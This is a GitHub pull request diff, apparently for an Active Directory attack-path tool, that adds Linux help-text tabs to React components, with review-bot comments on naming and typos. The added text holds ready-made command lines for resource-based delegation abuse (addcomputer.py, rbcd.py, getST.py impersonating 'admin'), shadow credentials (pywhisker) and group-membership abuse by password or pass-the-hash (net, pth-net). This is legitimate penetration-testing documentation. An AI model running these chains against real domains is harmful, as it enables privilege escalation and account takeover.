Adding abuse guidance from UNIX-like hosts #625

Merged
merged 32 commits into from
Apr 27, 2023
Merged
Changes from 28 commits
Commits
32 commits
f4b5bec
AddAllowedToAct Linux abuse
ShutdownRepo Dec 19, 2022
b88e29c
Adding references for AddAllowedToAct
ShutdownRepo Dec 19, 2022
8f15843
AddKeyCredentialLink Linux abuse
ShutdownRepo Dec 19, 2022
f99e4c0
AddMember Linux abuse
ShutdownRepo Dec 19, 2022
b056853
Fixing missing space with links
ShutdownRepo Dec 19, 2022
b73c2b3
AddSelf Linux abuse
ShutdownRepo Dec 19, 2022
a45e6d7
Adding other UNIX-like tools to AdminTo
ShutdownRepo Dec 19, 2022
6ea097b
AllExtendedRights Linux abuse
ShutdownRepo Dec 19, 2022
8c6b1e5
AllowedToAct Linux abuse
ShutdownRepo Dec 19, 2022
920c0e0
AllowedToDelegate Linux abuse
ShutdownRepo Dec 19, 2022
aac965b
DCSync Linux abuse
ShutdownRepo Dec 19, 2022
b7f2d70
ForceChangePassword Linux abuse
ShutdownRepo Dec 19, 2022
810603e
GenericAll Linux abuse
ShutdownRepo Dec 19, 2022
23b090d
Adding headers for AllExtendedRights linux abuse
ShutdownRepo Dec 19, 2022
34327bc
GenericWrite Linux abuse
ShutdownRepo Dec 19, 2022
91e2186
Fixing indentation
ShutdownRepo Dec 19, 2022
59c534c
GetChanges Linux abuse
ShutdownRepo Dec 19, 2022
361b4eb
GetChangesAll Linux abuse
ShutdownRepo Dec 19, 2022
21dd4b9
Forgot a few references
ShutdownRepo Dec 19, 2022
df384f3
Redundant case
ShutdownRepo Dec 19, 2022
208d42c
Owns Linux abuse
ShutdownRepo Dec 19, 2022
17f2773
Missing Owns refs
ShutdownRepo Dec 19, 2022
d3d67a8
ReadGMSAPassword Linux abuse
ShutdownRepo Dec 19, 2022
7ca242c
ReadLAPSPassword Linux abuse
ShutdownRepo Dec 19, 2022
a79a711
WriteAccountRestrictions Linux abuse
ShutdownRepo Dec 19, 2022
ec3eb5e
WriteDacl Linux abuse
ShutdownRepo Dec 19, 2022
0023864
WriteOwner Linux abuse
ShutdownRepo Dec 19, 2022
867990f
WriteSPN Linux abuse
ShutdownRepo Dec 19, 2022
e4e9a18
Removing addcomputer.py step for AllowedToAct
ShutdownRepo Jan 20, 2023
1714f2e
Fixed missing extension for secretsdump on DCSync, Getchanges, GetCha…
ShutdownRepo Jan 20, 2023
4c6d44a
Adding missing rbcd.py step for GenericAll, GenericWrite, Owns, Write…
ShutdownRepo Jan 20, 2023
38abfea
Replacing LAPSDumper with pyLAPS
ShutdownRepo Jan 20, 2023
Expand Up @@ -2,7 +2,8 @@ import React from 'react';
import PropTypes from 'prop-types';
import { Tabs, Tab } from 'react-bootstrap';
import General from './General';
import Abuse from './Abuse';
import WindowsAbuse from './WindowsAbuse';
import LinuxAbuse from './LinuxAbuse';
import Opsec from './Opsec';
import References from './References';

Expand All @@ -21,13 +22,16 @@ const AddAllowedToAct = ({
targetName={targetName}
/>
</Tab>
<Tab eventKey={2} title='Abuse Info'>
<Abuse />
<Tab eventKey={2} title='Windows Abuse'>
<WindowsAbuse />
</Tab>
<Tab eventKey={3} title='Opsec Considerations'>
<Tab eventKey={3} title='Linux Abuse'>
<LinuxAbuse />
</Tab>
<Tab eventKey={4} title='Opsec'>
<Opsec />
</Tab>
<Tab eventKey={4} title='References'>
<Tab eventKey={5} title='Refs'>
<References />
</Tab>
</Tabs>
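Review bot: the tab titles 'Opsec Considerations' and 'References' are shortened to 'Opsec' and 'Refs' in the same edit that adds the Linux tab; that is an unrelated UI wording change, and 'Refs' is less clear to a reader than 'References'. If the shortening is needed to fit five tabs in the modal, say so in the PR description; otherwise keep the original titles. The same rename is repeated in the AddKeyCredentialLink, AddMember and AddSelf tab hunks further down.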
42 changes: 42 additions & 0 deletions src/components/Modals/HelpTexts/AddAllowedToAct/LinuxAbuse.jsx
@@ -0,0 +1,42 @@
import React from 'react';

const LinuxAbuse = () => {
return (
<>
First, if an attacker does not control an account with an
SPN set, a new attacker-controlled computer account can be
added with Impacket's addcomputer.py example script:
<pre>
<code>
{
"addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
}
</code>
</pre>
We now need to configure the target object so that the attacker-controlled
computer can delegate to it. Impacket's rbcd.py script can be used for that
purpose:
<pre>
<code>
{
"rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
}
</code>
</pre>
And finally we can get a service ticket for the service name (sname) we
want to "pretend" to be "admin" for. Impacket's getST.py example script
can be used for that purpose.
<pre>
<code>
{
"getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
}
</code>
</pre>
This ticket can then be used with Pass-the-Ticket, and could grant access
to the file system of the TARGETCOMPUTER.
</>
);
};

export default LinuxAbuse;
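Review bot: placeholder naming is inconsistent across the three commands, which makes it hard to follow one object through the steps: the target is 'TargetComputer' in the rbcd.py line, 'targetcomputer.testlab.local' in the getST.py SPN and 'TARGETCOMPUTER' in the closing sentence, and the domain is given as the shell variables `$DOMAIN` / `$DomainController` in the addcomputer.py line but as a literal 'domain' in the other two. Pick one convention for all three. The first sentence should also state that the addcomputer.py step only works when the domain's MachineAccountQuota permits the controlled account to create computer objects, since the References hunk for this modal links the machineaccountquota page for exactly that reason. Minor: the prose switches voice between "an attacker" and "we" between paragraphs.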
Expand Up @@ -26,6 +26,14 @@ const References = () => {
<a href='https://github.com/Kevin-Robertson/Powermad#new-machineaccount'>
https://github.com/Kevin-Robertson/Powermad#new-machineaccount
</a>
<br />
<a href='https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'>
https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
</a>
<br />
<a href='https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota'>
https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota
</a>
</>
);
};
@@ -1,6 +1,6 @@
import React from 'react';

const Abuse = () => {
const WindowsAbuse = () => {
return (
<>
Abusing this primitive is currently only possible through the Rubeus
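Review bot: the unchanged context line "Abusing this primitive is currently only possible through the Rubeus ..." becomes wrong once this PR adds a 'Linux Abuse' tab next to this one. Reword it to scope the statement to Windows tooling (for example "From Windows, this primitive can be abused with Rubeus ...") so the two tabs do not contradict each other. The `Abuse` to `WindowsAbuse` rename itself is fine.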
Expand Down Expand Up @@ -62,4 +62,4 @@ const Abuse = () => {
);
};

export default Abuse;
export default WindowsAbuse;
Expand Up @@ -2,7 +2,8 @@ import React from 'react';
import PropTypes from 'prop-types';
import { Tabs, Tab } from 'react-bootstrap';
import General from './General';
import Abuse from './Abuse';
import WindowsAbuse from './WindowsAbuse';
import LinuxAbuse from './LinuxAbuse';
import Opsec from './Opsec';
import References from './References';

Expand All @@ -21,13 +22,16 @@ const AddKeyCredentialLink = ({
targetName={targetName}
/>
</Tab>
<Tab eventKey={2} title='Abuse Info'>
<Abuse sourceName={sourceName} sourceType={sourceType} />
<Tab eventKey={2} title='Windows Abuse'>
<WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
</Tab>
<Tab eventKey={3} title='Opsec Considerations'>
<Tab eventKey={3} title='Linux Abuse'>
<LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
</Tab>
<Tab eventKey={4} title='Opsec'>
<Opsec />
</Tab>
<Tab eventKey={4} title='References'>
<Tab eventKey={5} title='Refs'>
<References />
</Tab>
</Tabs>
@@ -0,0 +1,25 @@
import React from 'react';
import PropTypes from 'prop-types';

const LinuxAbuse = ({ sourceName, sourceType }) => {
return (
<>
<p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>

<pre>
<code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
</pre>

<p>
For other optional parameters, view the pyWhisker documentation.
</p>
</>
);
};

LinuxAbuse.propTypes = {
sourceName: PropTypes.string,
sourceType: PropTypes.string,
};

export default LinuxAbuse;
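Review bot: `sourceName` and `sourceType` are destructured and declared in `propTypes` but never used in the rendered output, so the values passed from AddKeyCredentialLink.jsx are dead. Either drop the props and the `PropTypes` import, or use them in the text the way the other help texts do. Minor: the paragraph says "pyWhisker" while the command is `pywhisker.py`; keep one spelling so the link text and the command obviously refer to the same tool.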
@@ -1,7 +1,7 @@
import React from 'react';
import PropTypes from 'prop-types';

const Abuse = ({ sourceName, sourceType }) => {
const WindowsAbuse = ({ sourceName, sourceType }) => {
return (
<>
<p>To abuse this privilege, use Whisker. </p>
Expand All @@ -18,15 +18,15 @@ const Abuse = ({ sourceName, sourceType }) => {
</pre>

<p>
For other optional parameters, view the Whisper documentation.
For other optional parameters, view the Whisker documentation.
</p>
</>
);
};

Abuse.propTypes = {
WindowsAbuse.propTypes = {
sourceName: PropTypes.string,
sourceType: PropTypes.string,
};

export default Abuse;
export default WindowsAbuse;
14 changes: 9 additions & 5 deletions src/components/Modals/HelpTexts/AddMember/AddMember.jsx
Expand Up @@ -2,7 +2,8 @@ import React from 'react';
import PropTypes from 'prop-types';
import { Tabs, Tab } from 'react-bootstrap';
import General from './General';
import Abuse from './Abuse';
import WindowsAbuse from './WindowsAbuse';
import LinuxAbuse from './LinuxAbuse';
import Opsec from './Opsec';
import References from './References';

Expand All @@ -16,13 +17,16 @@ const AddMember = ({ sourceName, sourceType, targetName, targetType }) => {
targetName={targetName}
/>
</Tab>
<Tab eventKey={2} title='Abuse Info'>
<Abuse sourceName={sourceName} sourceType={sourceType} />
<Tab eventKey={2} title='Windows Abuse'>
<WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
</Tab>
<Tab eventKey={3} title='Opsec Considerations'>
<Tab eventKey={3} title='Linux Abuse'>
<LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
</Tab>
<Tab eventKey={4} title='Opsec'>
<Opsec />
</Tab>
<Tab eventKey={4} title='References'>
<Tab eventKey={5} title='Refs'>
<References />
</Tab>
</Tabs>
53 changes: 53 additions & 0 deletions src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx
@@ -0,0 +1,53 @@
import React from 'react';
import PropTypes from "prop-types";

const LinuxAbuse = ({ sourceName, sourceType }) => {
return (
<>
<p>
Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
or prompted interactively if omitted from the command line:
</p>

<pre>
<code>
{
'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
}
</code>
</pre>

<p>
Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
</p>

<pre>
<code>
{
'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
}
</code>
</pre>

<p>
Finally, verify that the user was successfully added to the group:
</p>

<pre>
<code>
{
'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
}
</code>
</pre>
</>
);
};

LinuxAbuse.propTypes= {
sourceName: PropTypes.string,
sourceType: PropTypes.string
}

export default LinuxAbuse;
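Review bot: typo in the pass-the-hash paragraph: "it must be replace with" should read "it must be replaced with". Style: `import PropTypes from "prop-types";` uses double quotes while the `React` import on the line above uses single quotes, and `LinuxAbuse.propTypes= {` is missing the space before `=` and the trailing semicolon after the object; match the formatting used by the other new files in `src/components/Modals/HelpTexts`. As in the AddKeyCredentialLink file, `sourceName` and `sourceType` are declared but never used in the rendered output.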
4 changes: 4 additions & 0 deletions src/components/Modals/HelpTexts/AddMember/References.jsx
Expand Up @@ -14,6 +14,10 @@ const References = () => {
<a href='https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728'>
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728
</a>
<br />
<a href='https://www.thehacker.recipes/ad/movement/dacl/addmember'>
https://www.thehacker.recipes/ad/movement/dacl/addmember
</a>
</>
);
};
@@ -1,7 +1,7 @@
import React from 'react';
import PropTypes from "prop-types";

const Abuse = ({ sourceName, sourceType }) => {
const WindowsAbuse = ({ sourceName, sourceType }) => {
return (
<>
<p>
Expand Down Expand Up @@ -66,9 +66,9 @@ const Abuse = ({ sourceName, sourceType }) => {
);
};

Abuse.propTypes= {
WindowsAbuse.propTypes= {
sourceName: PropTypes.string,
sourceType: PropTypes.string
}

export default Abuse;
export default WindowsAbuse;
14 changes: 9 additions & 5 deletions src/components/Modals/HelpTexts/AddSelf/AddSelf.jsx
Expand Up @@ -2,7 +2,8 @@ import React from 'react';
import PropTypes from 'prop-types';
import { Tabs, Tab } from 'react-bootstrap';
import General from './General';
import Abuse from './Abuse';
import WindowsAbuse from './WindowsAbuse';
import LinuxAbuse from './LinuxAbuse';
import Opsec from './Opsec';
import References from './References';

Expand All @@ -16,13 +17,16 @@ const AddSelf = ({ sourceName, sourceType, targetName, targetType }) => {
targetName={targetName}
/>
</Tab>
<Tab eventKey={2} title='Abuse Info'>
<Abuse sourceName={sourceName} sourceType={sourceType} />
<Tab eventKey={2} title='Windows Abuse'>
<WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
</Tab>
<Tab eventKey={3} title='Opsec Considerations'>
<Tab eventKey={3} title='Linux Abuse'>
<LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
</Tab>
<Tab eventKey={4} title='Opsec'>
<Opsec />
</Tab>
<Tab eventKey={4} title='References'>
<Tab eventKey={5} title='Refs'>
<References />
</Tab>
</Tabs>
53 changes: 53 additions & 0 deletions src/components/Modals/HelpTexts/AddSelf/LinuxAbuse.jsx
@@ -0,0 +1,53 @@
import React from 'react';
import PropTypes from "prop-types";

const LinuxAbuse = ({ sourceName, sourceType }) => {
return (
<>
<p>
Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
or prompted interactively if omitted from the command line:
</p>

<pre>
<code>
{
'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
}
</code>
</pre>

<p>
Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
</p>

<pre>
<code>
{
'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
}
</code>
</pre>

<p>
Finally, verify that the user was successfully added to the group:
</p>

<pre>
<code>
{
'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
}
</code>
</pre>
</>
);
};

LinuxAbuse.propTypes= {
sourceName: PropTypes.string,
sourceType: PropTypes.string
}

export default LinuxAbuse;
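Review bot: this file is a verbatim copy of AddMember/LinuxAbuse.jsx, but the AddSelf edge means the controlled principal can add itself to the target group, not an arbitrary "TargetUser". The intro sentence "add the user to the target group" and the `addmem "TargetGroup" "TargetUser"` argument should make explicit that the member being added is the controlled account itself (the same principal given to `-U`), otherwise this help text describes AddMember rather than AddSelf. The "must be replace with" typo and the double-quoted `prop-types` import are carried over from the AddMember copy and should be fixed here as well.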